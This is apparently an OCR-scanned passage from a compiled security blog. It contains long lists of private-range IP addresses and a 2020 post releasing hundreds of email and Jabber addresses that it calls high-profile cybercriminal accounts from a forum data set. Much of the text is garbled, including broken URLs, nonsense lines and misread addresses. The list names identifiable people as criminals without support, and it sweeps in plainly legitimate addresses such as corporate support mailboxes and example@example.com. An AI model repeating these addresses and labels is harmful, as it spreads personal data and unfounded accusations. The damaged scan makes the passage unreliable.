10.221.31.18 
10.205.32.17 
10.194.106.10 
10.242.144.86 
10.231.9.60 
10.206.132.23 
10.208.163.59 
10.221.80.15 
10.252.75.151 
10.228.155.247 
10.218.21.133 
10.203.152.162 
10.204.128.132 
10.199.46.155 
10.192.220.97 
10.219.132.171 
10.229.153.91 
10.194.210.13 
10.231.189.82 
10.237.239.162 
10.209.220.195 
10.198.84.116 
10.194.48.158 
10.202.175.233 
10.246.253.228 
10.241.143.122 
10.230.217.108 
10.222.27.223 
8082 


10.245.173.51 
10.216.38.232 
10.227.41.231 
10.251.47.155 
10.201.219.176 
10.247.115.237 
10.199.131.4 
10.207.9.130 
10.198.93.130 
10.194.189.130 
10.250.98.92 
10.218.112.205 
10.235.216.120 
10.240.200.234 
10.204.125.156 
10.203.109.225 
10.204.160.241 
10.202.108.116 
10.239.242.205 
10.222.125.162 
10.222.49.12 
10.201.202.38 
10.212.183.130 
10.234.140.173 
10.239.93.118 
10.216.138.55 
10.246.78.188 
10.193.232.157 
10.237.72.30 
10.222.212.53 
10.211.229.78 
10.210.89.206 
10.206.148.39 
10.249.6.217 
10.227.253.138 
8083 


10.214.86.17 
10.214.205.118 
10.211.18.31 
10.210.200.189 
10.255.231.250 
10.213.18.108 
10.229.247.74 
10.201.242.66 
10.237.144.25 
10.195.28.162 
10.239.31.74 
10.245.93.96 
10.217.141.122 
10.236.159.63 
10.196.190.234 
10.227.19.148 
10.215.151.78 
10.209.181.81 
10.228.141.93 
10.220.88.158 
10.214.53.136 
10.192.23.153 
10.203.33.114 
10.204.199.53 
10.224.80.171 
10.250.179.143 
10.198.244.161 
10.251.105.145 
10.232.22.19 
10.211.109.160 
10.249.207.164 
10.248.97.6 
10.240.65.81 
10.240.186.236 
10.196.54.181 
8084 


10.235.246.63 
10.205.164.229 
10.241.204.95 
10.215.156.60 
10.226.230.63 
10.204.109.77 
100.228.224.103 
10.251.222.56 
10.214.62.80 
10.194.67.191 
10.215.228.224 
10.240.0.4 
10.250.24.156 
10.228.222.82 
10.250.239.234 
10.208.53.194 
10.205.10.140 
10.201.103.247 
10.236.239.228 
10.211.66.65 
10.197.242.40 
10.215.98.8 
10.234.90.135 
10.248.181.57 
10.234.34.223 
10.214.89.173 
10.235.231.47 
10.216.214.129 
10.204.209.199 
10.208.140.173 
10.233.111.75 
10.238.145.154 
10.247.98.197 
10.206.172.100 
10.233.2.176 


8085 


10.229.129.208 
10.226.106.14 
10.231.53.164 
10.236.134.78 
10.245.167.198 
10.253.74.105 
10.239.90.166 
10.227.228.129 
10.215.195.159 
10.219.127.109 
10.240.147.11 
10.234.236.51 
10.232.78.84 
10.203.99.245 
10.225.3.86 
10.210.35.107 
10.212.70.27 
10.222.236.138 
10.212.139.54 
10.225.159.254 
10.235.65.24 
10.254.237.160 
10.236.121.156 
10.197.182.93 
10.193.164.224 
10.205.138.15 
10.227.146.252 
10.219.151.240 
10.201.251.144 
10.219.127.21 
10.232.209.189 
10.223.142.65 
10.224.180.38 
10.239.172.20 
10.230.49.178 
8086 


10.249.250.44 
10.251.171.38 
10.250.68.93 
10.209.69.126 
10.204.65.119 
10.238.124.145 
10.236.77.180 
10.224.62.46 
10.233.174.58 
10.215.100.108 
100.238.196.253 
10.240.221.110 
10.211.75.220 
10.221.110.24 
10.253.159.232 
10.244.142.52 
10.228.244.37 
10.252.219.60 
10.248.204.104 
10.213.162.250 
10.223.236.160 
10.203.72.189 
10.231.33.117 
10.217.65.134 
10.223.181.64 
10.203.26.209 
10.242.36.192 
10.196.202.60 
10.239.53.178 
10.246.205.241 
10.219.238.201 
10.246.30.69 
10.231.185.212 
10.212.6.218 
10.214.156.65 
8087 


10.235.61.4 
10.233.201.23 
10.213.17.67 
10.254.118.108 
10.231.226.15 
10.244.236.253 
10.218.199.135 
10.193.133.165 
10.233.228.189 
10.204.27.113 
10.229.103.134 
10.244.249.88 
10.226.224.230 
10.202.15.88 
10.197.182.9 
10.233.173.41 
10.210.138.225 
10.231.210.22 
10.251.52.65 
10.250.137.85 
10.252.110.239 
10.197.32.190 
10.218.148.230 
10.213.185.203 
10.214.83.158 
10.192.125.41 
10.228.132.191 
10.235.71.203 
10.250.255.228 
10.223.228.42 
10.216.111.228 
10.243.248.68 
10.197.49.211 
10.246.159.201 
10.217.137.97 
8088 


10.217.51.99 
10.235.53.108 
10.213.99.104 
10.229.26.110 
10.239.106.39 
10.213.32.131 
10.255.66.65 
10.211.134.200 
10.207.127.124 
10.240.252.24 
10.230.180.133 
10.246.72.4 
10.233.96.184 
10.218.36.60 
10.222.253.118 
10.203.76.75 
10.218.211.101 
10.222.189.65 
10.252.196.177 
10.227.106.28 
10.237.68.233 
10.208.140.19 
10.231.26.137 
10.234.211.186 
10.223.167.143 
10.216.169.251 
10.220.204.37 
10.242.195.55 
10.252.245.87 
10.223.190.115 
10.222.49.201 
10.255.58.133 
10.204.52.66 
10.227.170.97 
10.202.67.169 


8089 


10.192.96.150 
10.248.193.223 
10.252.123.244 
10.220.121.173 
10.225.191.221 
10.209.175.247 
10.237.249.131 
10.242.225.113 
10.223.91.179 
10.248.105.139 
10.251.218.25 
10.245.230.6 
10.228.13.165 
10.196.175.246 
10.245.162.118 
10.196.149.162 
10.236.163.156 
10.244.247.221 
10.214.168.243 
10.219.175.200 
10.217.38.218 
10.219.183.173 
10.208.191.129 
10.252.235.129 
10.202.139.37 
10.249.104.25 
10.194.184.117 
10.201.4.224 
10.212.115.121 
10.238.66.233 
10.239.187.238 
10.204.89.35 
10.236.47.72 
10.218.24.29 
10.222.191.148 
8090 


10.248.225.178 
10.251.101.210 
10.245.253.7 
10.228.94.62 
10.209.57.206 
10.235.24.218 
10.204.115.133 
10.216.112.253 
10.240.218.211 
10.197.88.193 
10.193.212.201 
10.207.95.127 
10.209.255.63 
10.203.255.84 
10.248.114.251 
10.208.73.110 
10.248.184.126 
10.200.134.253 
10.254.3.237 
10.236.19.42 
10.231.107.147 
10.202.138.15 
10.232.118.3 
10.202.145.96 
10.243.216.210 
10.231.169.245 
10.220.188.127 
10.250.19.92 
10.210.181.125 
10.194.69.224 
10.205.205.92 
10.196.44.129 
10.208.80.25 
10.229.21.158 
10.240.77.89 


8091 


10.216.244.202 
10.252.181.168 
10.237.49.131 
10.215.214.185 
10.218.218.189 
10.246.19.69 
10.203.66.100 
10.212.155.138 
10.202.68.228 
10.254.163.34 
10.251.180.154 
10.197.126.241 
10.241.129.115 
10.254.21.59 
10.210.18.233 
10.194.197.219 
10.207.144.5 
10.197.233.66 
10.195.36.3 
10.229.140.200 
10.228.119.30 
10.197.50.87 
10.238.157.38 
10.246.201.105 
10.210.158.80 
10.243.79.213 
10.200.104.45 
10.252.32.237 
10.226.140.6 
10.214.162.72 
10.198.6.91 
10.242.120.222 
10.194.28.177 
10.237.92.47 
10.196.161.24 
8092 


10.228.127.103 
10.236.229.87 
10.226.162.229 
10.204.127.99 
10.200.160.37 
10.238.18.152 
10.199.63.14 
10.245.85.78 
10.240.55.248 
10.217.80.139 
10.199.190.85 
10.254.193.133 
10.255.60.111 
10.194.234.93 
10.238.98.49 
10.252.47.74 
10.225.6.156 
10.209.227.179 
10.233.248.220 
10.247.95.3 
10.224.61.63 
10.243.57.3 
10.206.121.16 
10.205.91.20 
10.241.123.118 
10.234.171.135 
10.228.167.161 
10.211.163.218 
10.225.152.50 
10.209.184.4 
10.217.31.225 
10.211.37.206 
10.194.234.181 
10.235.204.250 
10.232.230.158 


8093 


10.204.194.99 
10.248.74.246 
10.222.103.155 
10.213.84.161 
10.203.88.131 
10.201.86.212 
10.226.175.185 
10.216.4.36 
10.255.133.155 
10.225.125.149 
10.210.129.11 
10.203.73.229 
10.234.226.24 
10.242.207.199 
10.244.144.177 
10.232.225.128 
10.214.236.16 
10.243.158.219 
10.216.91.73 
10.197.213.24 
10.222.182.162 
10.223.242.12 
10.199.166.143 
10.243.141.104 
10.246.81.165 
10.205.99.145 
10.207.243.232 
10.244.52.132 
10.192.102.252 
10.215.197.152 
10.249.189.84 
10.224.217.57 
10.252.108.134 
10.203.80.201 
10.214.205.114 
8094 


10.222.109.178 
10.197.134.141 
10.220.42.252 
10.243.188.60 
10.226.200.98 
10.199.219.96 
10.221.114.206 
10.193.164.60 
10.240.83.108 
10.255.176.63 
10.207.86.219 
10.236.104.64 
10.237.92.249 
10.252.150.221 
10.195.228.154 
10.241.197.82 
10.255.173.74 
10.205.113.89 
10.244.217.14 
10.224.122.40 
10.224.120.100 
10.206.181.206 
10.225.216.195 
10.226.228.106 
10.204.121.118 
10.198.16.125 
10.201.81.167 
10.194.251.251 
10.250.204.94 
10.214.122.44 
10.216.73.162 
10.252.76.23 
10.197.46.136 
10.201.205.150 
10.228.62.18 


8095 


10.229.62.36 
10.215.37.240 
10.214.244.46 
10.237.113.174 
10.202.248.160 
10.249.195.155 
10.245.135.40 
10.239.242.165 
10.254.105.26 
10.202.155.236 
10.253.233.239 
10.222.204.23 
10.223.95.60 
10.237.61.170 
10.205.170.130 
10.244.130.107 
10.248.163.164 
10.255.64.60 
10.210.79.33 
10.254.243.164 
10.212.254.57 
10.229.72.147 
10.192.17.20 
10.192.133.162 
10.201.209.244 
10.247.163.125 
10.237.132.124 
10.217.191.118 
10.199.88.217 
10.199.230.73 
10.248.18.137 
10.245.223.198 
10.251.147.136 
10.243.45.74 
10.225.141.180 
8096 


10.222.100.194 
10.206.34.46 
10.239.3.164 
10.251.22.224 
10.193.246.241 
10.233.20.133 
10.234.175.6 
10.253.77.95 
10.207.118.205 
10.210.137.162 
10.195.114.166 
10.195.43.208 
10.194.230.151 
10.245.156.252 
10.225.35.183 
10.217.151.95 
10.213.117.147 
10.215.108.176 
10.248.125.244 
10.197.178.91 
10.221.187.103 
10.221.32.226 
10.219.39.95 
10.205.74.180 
10.205.21.26 
10.192.252.2 
10.252.150.217 
10.192.135.229 
10.195.210.180 
10.218.168.130 
10.224.13.19 
10.250.70.183 
10.204.191.30 
10.254.185.234 
10.241.239.84 


8097 


10.224.153.77 
10.251.232.189 
10.230.46.127 
10.231.174.229 
10.192.217.238 
10.197.222.216 
10.252.222.102 
10.208.59.43 
10.202.63.179 
10.215.93.225 
10.250.145.17 
10.237.180.238 
10.227.70.209 
10.229.102.1 
10.249.146.191 
10.245.149.129 
10.249.46.35 
10.213.127.54 
10.244.194.4 
10.217.113.109 
10.212.236.70 
10.225.154.81 
10.241.156.58 
10.194.26.115 
10.228.102.173 
10.221.18.224 
10.247.2.237 
10.222.191.76 
10.204.28.13 
10.212.112.177 
10.215.182.26 
10.216.216.94 
10.213.110.186 
10.247.164.191 
10.213.119.57 
8098 


10.219.42.68 
10.253.65.89 
10.210.82.160 
10.247.34.176 
10.254.243.66 
10.205.193.147 
10.192.125.76 
10.230.88.63 
10.218.131.35 
10.226.84.96 
10.248.185.171 
10.217.138.190 
10.194.15.102 
100.201.222.133 
10.247.14.230 
10.230.15.120 
10.213.183.180 
10.225.164.204 
10.245.20.51 
10.237.154.79 
10.254.13.224 
10.219.113.99 
10.202.24.240 
10.230.246.176 
10.231.38.89 
10.236.38.227 
10.249.163.26 
10.218.135.112 
10.254.174.31 
10.226.121.45 
10.231.175.243 
10.223.139.74 
10.241.101.233 
10.219.146.198 
10.236.99.152 


8099 


10.214.238.61 
10.237.192.204 
10.222.219.252 
10.251.135.195 
10.250.239.96 
10.198.173.131 
10.192.252.108 
10.225.77.237 
10.241.243.110 
10.222.81.189 
10.234.39.205 
10.254.98.190 
10.241.50.24 
10.244.33.59 
10.213.44.194 
10.215.168.250 
10.214.30.22 
10.199.184.35 
10.236.40.216 
10.216.154.201 
10.202.4.241 
10.211.227.192 
10.242.103.53 
10.223.255.168 
10.238.156.230 
10.219.39.243 
10.237.91.219 
10.225.14.57 
10.212.247.9 
10.201.193.251 
10.228.70.100 
10.205.241.105 
10.225.119.80 
10.238.29.102 
10.216.61.188 
8100 


10.231.73.103 
10.201.136.237 
10.221.32.182 
10.243.99.22 
10.250.139.198 
10.192.161.98 
10.226.55.131 
10.253.187.188 
10.208.204.169 
10.233.23:225 
10.192.229.133 
10.200.226.18 
10.209.127.54 
10.225.175.84 
10.194.94.173 
10.209.243.43 
10.209.198.102 
10.194.35.197 
10.198.48.35 
10.199.2.95 
10.251.116.174 
10.232.203.237 
10.234.91.19 
10.217.235.208 
10.195.111.185 
10.212.222.181 
10.198.179.31 
10.200.169.60 
10.222.107.253 
10.237.102.245 
10.237.125.253 
10.207.77.5 
10.216.25.55 
10.194.107.37 
10.222.159.47 


8101 


10.219.128.21 
10.208.0.77 
10.225.34.91 
10.228.231.26 
10.255.146.192 
10.226.42.204 
10.216.178.228 
10.193.180.222 
10.193.180.217 
10.217.193.122 
10.208.247.94 
10.254.150.253 
10.204.109.180 
10.207.176.238 
10.227.244.172 
10.202.255.172 
10.238.103.66 
10.247.89.174 
10.243.91.46 
10.226.69.41 
10.230.33.238 
10.225.199.213 
10.212.90.35 
10.197.170.42 
10.211.22.253 
10.198.95.94 
10.219.180.117 
10.210.198.233 
10.237.227.88 
10.232.98.76 
10.195.210.246 
10.247.208.186 
10.228.12.174 
10.239.194.94 
10.215.24.158 
8102 


10.208.93.28 
10.197.234.79 
10.229.129.102 
10.222.62.114 
10.246.89.243 
10.219.61.47 
10.192.139.55 
10.193.196.169 
10.248.151.117 
10.208.220.233 
10.212.70.166 
10.222.226.82 
10.207.108.148 
10.192.90.221 
10.212.176.146 
10.192.137.97 
10.214.252.44 
10.203.169.66 
10.208.134.150 
10.243.154.3 
10.192.203.14 
10.252.107.250 
10.194.216.141 
10.216.144.40 
10.209.38.219 
10.255.129.198 
10.217.212.126 
10.201.222.162 
10.230.65.126 
10.240.31.30 
10.225.4.80 
10.193.86.162 
10.224.125.161 
10.192.157.199 
10.243.174.91 


8103 


10.218.36.238 
10.194.224.112 
10.200.147.109 
10.194.17.43 
10.242.27.36 
10.207.88.138 
10.255.16.198 
10.251.170.135 
10.213.188.40 
10.254.214.51 
10.243.179.21 
10.237.161.222 
10.206.223.253 
10.205.50.10 
10.198.140.252 
10.233.238.13 
10.221.116.236 
10.204.114.215 
10.255.70.208 
10.245.39.76 
10.253.94.195 
10.248.71.119 
10.195.233.131 
10.248.117.211 
10.235.137.195 
10.245.105.209 
10.215.146.17 
10.192.12.164 
10.230.58.57 
10.230.151.17 
10.206.19.191 
10.239.147.97 
10.208.122.236 
10.244.54.226 
10.200.120.25 
8104 


10.195.86.146 
10.239.226.151 
10.224.114.17 
10.238.128.253 
10.231.193.171 
10.209.183.162 
10.209.213.176 
10.246.148.128 
10.240.148.38 
10.240.2.234 
10.220.125.143 
10.225.159.153 
10.235.214.202 
10.226.125.174 
10.236.242.62 
10.255.94.123 
10.236.27.119 
10.251.200.170 
10.219.160.85 
10.203.121.42 
10.234.208.133 
10.212.94.138 
10.249.99.246 
10.221.169.151 
10.219.51.47 
10.238.201.106 
10.204.79.179 
10.238.181.50 
10.202.33.172 
10.229.37.248 
10.230.220.86 
10.225.179.136 
10.198.163.103 
10.224.96.230 
10.208.254.21 


8105 


10.208.243.203 
10.213.235.105 
10.211.18.98 
10.195.240.198 
10.250.236.95 
10.247.16.225 
10.223.247.181 
10.206.33.74 
10.192.218.135 
10.223.88.50 
10.237.107.178 
10.232.214.24 
10.226.153.9 
10.207.45.42 
10.252.151.230 
10.192.46.165 
10.204.242.64 
10.232.67.196 
10.207.40.62 
10.251.46.24 
10.235.72.109 
10.252.206.17 
10.228.26.100 
10.215.135.23 
10.217.78.45 
10.193.63.3 
10.238.121.247 
10.230.190.236 
10.197.41.232 
10.233.164.210 
10.249.225.24 
10.227.74.30 
10.237.129.104 
10.214.22.90 
10.235.53.206 
8106 


10.238.174.17 
10.236.49.96 
10.228.49.94 
10.219.180.48 
10.242.136.95 
10.201.28.57 
10.250.130.140 
10.198.21.153 
10.203.204.167 
10.244.220.88 
10.195.138.179 
10.197.250.201 
10.208.23.234 
10.236.44.229 
10.215.184.182 
10.250.218.212 
10.234.54.12 
10.201.59.224 
10.219.9.230 
10.245.136.30 
10.215.102.220 
10.245.138.99 
10.238.64.184 
10.237.1.235 
10.254.251.176 
10.243.64.96 
10.213.88.145 
10.212.20.7 
10.240.101.221 
10.238.30.106 
10.228.36.12 
10.205.66.176 
10.192.98.115 
10.232.142.167 
10.215.20.128 


8107 


10.212.53.229 
10.231.69.100 
10.211.69.128 
10.229.83.147 
10.198.194.175 
10.192.168.209 
10.201.183.106 
10.196.238.237 
10.211.178.78 
10.232.160.195 
10.210.225.31 
10.253.4.103 
10.252.22.65 
10.249.11.80 
10.216.21.63 
10.252.170.8 
10.231.43.248 
10.202.179.35 
10.229.163.199 
10.206.186.124 
10.249.252.122 
10.241.24.119 
10.251.148.192 
10.245.213.17 
10.207.10.141 
10.239.130.42 
10.243.254.210 
10.195.91.62 
10.241.99.14 
10.250.140.166 
10.234.118.115 
10.221.115.7 
10.241.149.181 
10.238.144.56 
10.249.78.176 
8108 


10.193.28.44 
10.239.127.25 
10.196.105.5 
10.240.101.13 
10.214.108.192 
10.241.157.125 
10.241.172.103 
10.216.134.194 
10.225.191.233 
10.238.117.237 
10.222.89.145 
10.214.83.68 
10.222.127.182 
10.216.84.137 
10.255.48.240 
10.253.25.26 
10.236.76.19 
10.234.41.120 
10.232.82.107 
10.235.103.75 
10.232.195.124 
10.215.161.200 
10.206.151.76 
10.220.132.170 
10.245.48.193 
10.203.238.40 
10.201.28.89 
10.207.109.33 
10.255.149.25 
10.253.227.39 
10.220.197.123 
10.218.189.198 
10.210.174.243 
10.212.28.111 
10.210.223.121 


8109 


10.204.49.196 
10.208.47.47 
10.250.66.37 
10.251.113.250 
10.204.6.136 
10.192.217.90 
10.216.187.38 
10.253.185.168 
10.231.11.46 
10.233.121.144 
10.210.36.202 
10.223.55.169 
10.218.191.105 
10.218.156.148 
10.231.103.69 
10.206.46.49 
10.240.98.54 
10.244.183.49 
10.237.154.112 
10.226.177.124 
10.223.210.153 
10.193.61.67 
10.228.25.34 
10.199.212.188 
10.233.59.233 
10.249.74.139 
10.196.219.59 
10.239.194.194 
10.213.210.195 
10.217.116.103 
10.215.56.73 
10.233.206.136 
10.201.53.127 
10.217.171.47 
10.228.29.195 
8110 


10.208.56.253 
10.239.189.224 
10.194.186.242 
10.222.25.247 
10.246.40.119 
10.228.156.35 
10.229.243.112 
10.240.173.69 
10.226.171.65 
10.209.170.136 
10.198.202.22 
10.242.91.140 
10.216.30.212 
10.240.149.125 
10.196.10.214 
10.218.147.31 
10.249.99.234 
10.220.92.249 
10.209.9.59 
10.233.199.51 
10.209.50.62 
10.204.189.82 
10.198.194.230 
10.246.96.57 
10.206.190.73 
10.239.217.37 
10.193.115.212 
10.236.109.214 
10.224.7.218 
10.248.5.227 
10.198.227.146 
10.204.3.27 
10.252.210.105 
10.192.123.109 
10.239.130.172 
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10.205.11.4 
10.217.1.198 
10.238.241.247 
10.202.160.192 
10.250.236.52 
10.195.10.21 
10.220.116.219 
10.241.166.240 
10.225.72.21 
10.238.232.159 
10.246.98.116 
10.201.63.7 
10.230.200.101 
10.244.45.43 
10.246.193.213 
10.245.49.214 
10.197.143.61 
10.253.90.206 
Stay tuned! 


1. https://1.bp. blogspot .com/-dP-k7kgAY10/XOFD7 1arrOI/AAAAAAAALHY /HuMZgq2 Jyvo4xE1B4yDAqdz6XBXS5R4o0gCLcBGAsYHQ 
tps: //adanchev.Wlogapot con/2078/10 anno ncingé Yat eaforonent~end- oon a 

Roe cans creep creo cere ee ete eee re 

. https://ddanchev.blogspot .com/2020/07/exposing-modern- cybercrime-ecosystem_28.htm 


. https: //ddanchev.blogspot.com/2020/07/cybercrime-forum-data-set-2019-free. htm 
. https: //ddanchev.blogspot.com/2020/07/cybercrime-forum-data-set-2019-free. htm 


https://unit-123.org/wp-content/uploads/2020/07/Cybercrime_Forum_Data_Set_Archive_2019.zip 
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16.6.3 Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber and 
XMPP Accounts Including Email Address Accounts - Part Two (2020-08-28 12:33) 


Off-the-Record Messaging 


Dear blog readers, 


| wanted to take the time and effort and some of my recently published and released find- 
ings part of my currently ongoing OSINT and Law Enforcement [1]Operation called "[2]Uncle 
George" where | intend to present the findings from what appears to be one of the most com- 
prehensive and publicly accessible free [3]Cybercrime Forum Data Set for 2019 where | intend 
to actually shut down some of the cybecrime forum communities which | included in the origi- 
nal data set potentially assisting the U.S Intelligence Community and U.S Law Enforcement on 
its way to track down and prosecute the cybercriminals behind these campaigns and actually 
assist in a possible cybercrime forum take down attempt. 


In this post I’ll share a direct download copy including an actual direct download link for some of 
the [4]high-profile cybercriminal XMPP/Jabber accounts including email addresses that are ac- 
tually participating in rogue and fraudulent online service propositions with the idea to possibly 
assist in a current or ongoing "lawful surveillance" type of law enforcement or U.S Intelligence 
Community activity including a [5]sample of all the IPs found in the publicly accessible data 
set. 


[ 6 ] feanpaenner c Hoemes 2020 ragom! 


Grab a [7]direct download copy of all the XMPP/Jabber including email addresses found in the 
original [8]Cybercrime Forum Data Set for 2019 which you can also download from [9]here 
for research and historical OSINT preservation purposes and actually approach me at dan- 
cho.danchev@hush.com in terms of sharing the results of your enrichment process which | 
will then shortly feature in a separate post. 


Sample high-profile cybercriminal XMPP/Jabber including email addresses of high-profile cy- 
bercriminals released courtesy of OSINT and Law Enforcement Operation "Uncle George": 
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vzlominfa@gmail.com 
vzlominfa@gmail.ru 
acapitov@gmail.com 
ucrop@exploit.im 
tatyammr@gmail.com 
kasko2016@gmail.com 
mOckingbird@xmpp.jp 
keyn@Onl1ne.at 
malixul@xmpp.jp 
skupegift@jabbim.cz 
TaxiMaxim@xmpp.jp 
nedflanders777@darkjabber.cc 
acapitov@sj.ms 
bio5sergkach@gmail.com 
Faust1540@yandex.ru 
versace i@xmpp.jp 
lexmc@xabber.org 
lexmc84@gmail.com 
schulc@jabber.ru 
thaispb@zloy.im 
lehal710@freelab.cc 
tursstravel@xmpp.jp 
kkj14381@dukgo.com 
scanworld@xmpp.jp 
hacknet@exploit.im 
r7d@sj.ms 
zazor@exploit.im 
ukrplastik@exploit.im 
money2maxfaction@xmpp.ru 
kivspas@xmpp.jp 
yourseller@zloy.im 
rivaldo@jabnet.org 
villese@xmpp.jp 
ms.alliono4ka@exploit.im 
minfin@jabbim.com 

8114 


pabron54@sj.ms 
schoolhack _vk@jabber.ru 
lyubye.dokumenty@yandex.ru 
lyubyedokumenty@xmpp.jp 
baron88@exploit.im 
vovabirukov2015@gmail.com 
tele2system@gmail.com 
wildwindone@yandex.ru 
vasyan151515@xmpp.jp 
Spravkarus@gmail.com 
paoko@yandex.ru 
paoko@xmpp.jp 
hackmaxx@yandex.ru 
hackmarxxx@gmail.com 
limlom@jabbim.cz 
black888@exploit.im 
xxlsandora777@exploit.im 
igor.rosliakow@yandex.ru 
TopExpres@xmpp.jp 
r@jabbim.cz 
offelia.topo@xmpp.jp 
jfg-forum@yandex.com 
robert.khit@yandex.ru 
Service.hecknet@gmail.com 
antibank.cc@gmail.com 
Sergey.vzlom.na.zakaz@gmail.com 
support@stripe.com 
hacktogods@gmail.com 
example@example.com 
santa _11@dukgo.com 
andrey.mironov663@gmail.com 
andrey _mir@exploit.im 
basaport@sj.ms 
ravaha@xabber.org 
serg3888rus@jabber.ru 
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demon304dima@mail.ru 
gleb-vas@bk.ru 
StalinOsago@tuta.io 
bitmixbot@securejabber.me 
abba.25@xabber.org 
urartul1961@gmail.com 
turbion@jabber.calyxinstitute.org 
outfront 88@inbox.ru 
elitevps@jab.im 
neboltay@exploit.im 
limitless@xmpp.ru 

komrakoff support@exploit.im 
Dis911@exploit.im 
jan1405@gmail.com 
nailmobilel1@gmail.com 
mentol@otrisovka.pro 
ribak@zloy.im 
uslugimail@gmail.com 
JustKowalsky@exploit.im 
chipadale@xabber.org 
Pechati@Tuta.io 
krabatservice@gmail.com 
470000064@jabber.ru 
jabber@jabber.ru 
BitCoiner@exploit.im 
GoodmanWTH@exploit.im 
babilon@jabbim.cz 
perfectpro@exploit.im 
Blackbiz@thesecure. biz 
champ@zloy.im 
alikbond@exploit.im 
besprovodnoy@sj.ms 
web.studio.avram.lincoln@xabber.org 
web.avram.lincoln@mail.ru 
VIKTORIA Rasputina@xmpp.ru 
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ds.support@exploit.im 
crypt-info@protonmail.ch 


jonjonesatm@jabber.cd 


1problem.solutionlL@gmail.com 


zloy88@exploit.im 
8730870@mail.ru 
zalivservis2019@mail.ru 
foptpost@gmail.com 
mskextazi@exploit.im 
msk10@gazimport.ru 
144.mimino@gmail.com 
mimino144@jabber.pw 
mimino.144@mail.ru 
ukrplastik@DarkNet.im 
epolan@yandex.ru 
anynax228@xmpp.jp 
asedmasad@secmail.pro 
yolo5oto@xmpp.jp 
support@mts.ru 
pelemesh@darkjabber.cc 
goloval3@xmpp.jp 
sitnikova _alena89@bk.ru 
kpolinko@yandex.ru 
fixxx@exploit.im 
sonnik@protonmail.com 
kpi.gfcl@yandex.ru 
avadonru@jabber.ru 
zolton.hock@gmail.com 
scano@jabber.org 
scano@pandion.im 
apatity osago@bk.ru 
lucifer.m.iliusha@yandex.ru 
motoristrf@mail.ru 
konstanta06@jabber.ru 


darkmaneger@xabber.org 
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maximl2705@yandex.ru 

btc clock@sj.ms 
rkalaogmac@torbox3uiot6wchz.onion 
tumoxa@exploit.im 

alexfish7 @torxmppu5u7amsed.onion 
ev.volkova@mail.ru 
dutyfreealcogol@mail.ru 
elfik1524@mail.ru 
elekseevatatiana@mail.ru 
n.golovan2016@gmail.com 
vaar@jabber.ru 
korona@darkdna.net 
musson@swissjabber.ch 
idredidvk@gmail.com 
geniebos99@gmail.com 
wng@stikeman.com 
bevhill@iinet.net.au 
razvedka.service@gmail.com 
razvedka@xmpp.jp 
iceman111@sj.ms 

anton 666@xmpp.jp 
probiv666@163.com 
zloymark1@zloy.im 
triadavzlom@gmail.com 
aristokrat@xmpp.jp 
hackpasstinfo@gmail.com 
hackpastinfo@gmail.com 
orbit@inbox.im 
admin@thesecure. biz 
vaca-flaca@exploit.im 
9661405214@mail.ru 
maxil3poison@gmail.com 
aiva74@xmpp.jp 
yekaterina.shakhvorostov@mail.ru 
molmolchan@yandex.ru 
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arahabaki@conversations.im 
TARANTUL@securejabber.me 
miroha@xmpp.jp 
Obitatel@xabber.org 
Morf1k212@jabber.ru 
partycode@exploit.im 
jabbasoft@xmpp.jp 
hubabuba777@xabber.org 
ni4tozhesto89@xmpp.jp 
jetalex007@jabber.ru 
bonano99@xmpp.jp 
damster@xmpp.jp 
getstarted777@xmpp.jp 
exOrcist@xmpp.jp 
ramband@xabber.org 
mysliwiec111@jabber.ru 
stingvsg@xabber.org 
damiel O8@xmpp.jp 
NikolasErfe@sj.ms 
kirdeb@xabber.org 
Osetin51@jabber.ru 
Darkkkkk@xabber.org 
arrow1174@jabber.ru 
missledi6.09@xabber.org 
goldenl23@xmpp.jp 
chiripiri@xmpp.jp 
fafa66@exploit.im 
lokky999@jabber.ru 
DoctorWEB@Exploit.im 
Barvikhaltwo@exploit.im 
simon15 jabber@jabber.ru 
coinyard@jabbim.com 
pirat@jabber.se 
chan1214@exploit.im 


m.dunaew2018@yandex.ru 
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redfieldwtf@xabber.org 
spox@jabber.ru 
honda-mafiya@jabber.ru 
michail.nete@gmail.com 
wwwuuu@blackjabber.cc 
dermantin4d8@wwh.so 
zombie88@jabb.im 
ooosgk87@mail.ru 
lextreyd@mail.ru 
mkml777@bk.ru 
a.burdin@bk.ru 
alexdi@xabber.org 
bestellen8131@gmail.com 
evilhunt@wallstreetjabber. biz 
$$11223344aa@yandex.ru 
qwarto@xmpp.jp 
qwarto999@gmail.com 
RonnyFletcher@zloy.im 
hoodiwoodi@zloy.im 
yasha.zefo@gmail.com 
jc.bankman@xmpp.jp 
jc.bankman@exploit.im 
kashtakyn119@bk.ru 


BOJIDUUME, PECYIIAPHO NONONHAEMBIE P PBbi. 


1) ——>S7ik a _m 


armaniexchangel77@xmpp.jp 
Conor Hogan 98@hotmail.co.uk 
tro9n@jabber.cz 
vasyavasek@exploit.im 
rodik1@sj.ms 

rodik1@jabber.sk 
horopot123@sj.ms 
jqwerty@procrd.pro 
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tarazini@pandion.im 
floyd@fysh.in 
tarazini@xmpp.jp 
floyd@fysh.im 
antoniosalamandre@xmpp.jp 
Pustoparovl1@xmpp.jp 
pustoparov@zloy.im 
grshvasin@gmail.com 
iluzionistO07@xmpp.jp 
dima526@bk.ru 
saparikg@mail.ru 
napoleon1812@xmpp.jp 
yulueve@mail.ru 
avidOhustler@xmpp.jp 
sirotka@dukgo.com 
OlegBS@ Xabber.org 
icstock@jabber.at 
maleyone@jabber.ru 
sergiodyt@xabber.org 
kviskar90@xmpp.jp 
lornmalvo@xabber.org 
nikiton@xabber.org 
anastolkarat@gmail.com 
kroblmprm@sj.ms 
alexruda@darkjabber.cc 
lelchapo@xmpp.jp 
mecker231@jabber.ru 
vzllomps@gmail.com 
almera2015@yahoo.com 
89204848804@mail.ru 
petruhka@jabber.ru 
shaker13@exploit.im 
emilio666@securejabber.me 
krisa@xmpp.jp 
almiranis@yandex.ru 
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chesterr@exploit.im 
alexei.alex1976@yandex.ru 
dropneed@openmailbox.org 
brutaliti001 @darkjabber.cc 
zaboteur@jabber.cd 
usa4@jabme.de 
mbm@pandion.im 
Ikazza4ok@yandex.ru 
roddi@xabber.org 
BigBoyyy@tutanota.com 
oleut@leechcraft.org 
In-Disguise-VPN@jabber.org 
masrtersteak001@gmail.com 
webget@exploit.im 
qwertov@jabber.ru 
faceslime@exploit.im 
Dummmer@jabber.ru 
buransupport@exploit.im 
kysovue@xmpp.jp 
franklinwoods@exploit.im 
vision777@xmpp.jp 
snpooky1@gmail.com 
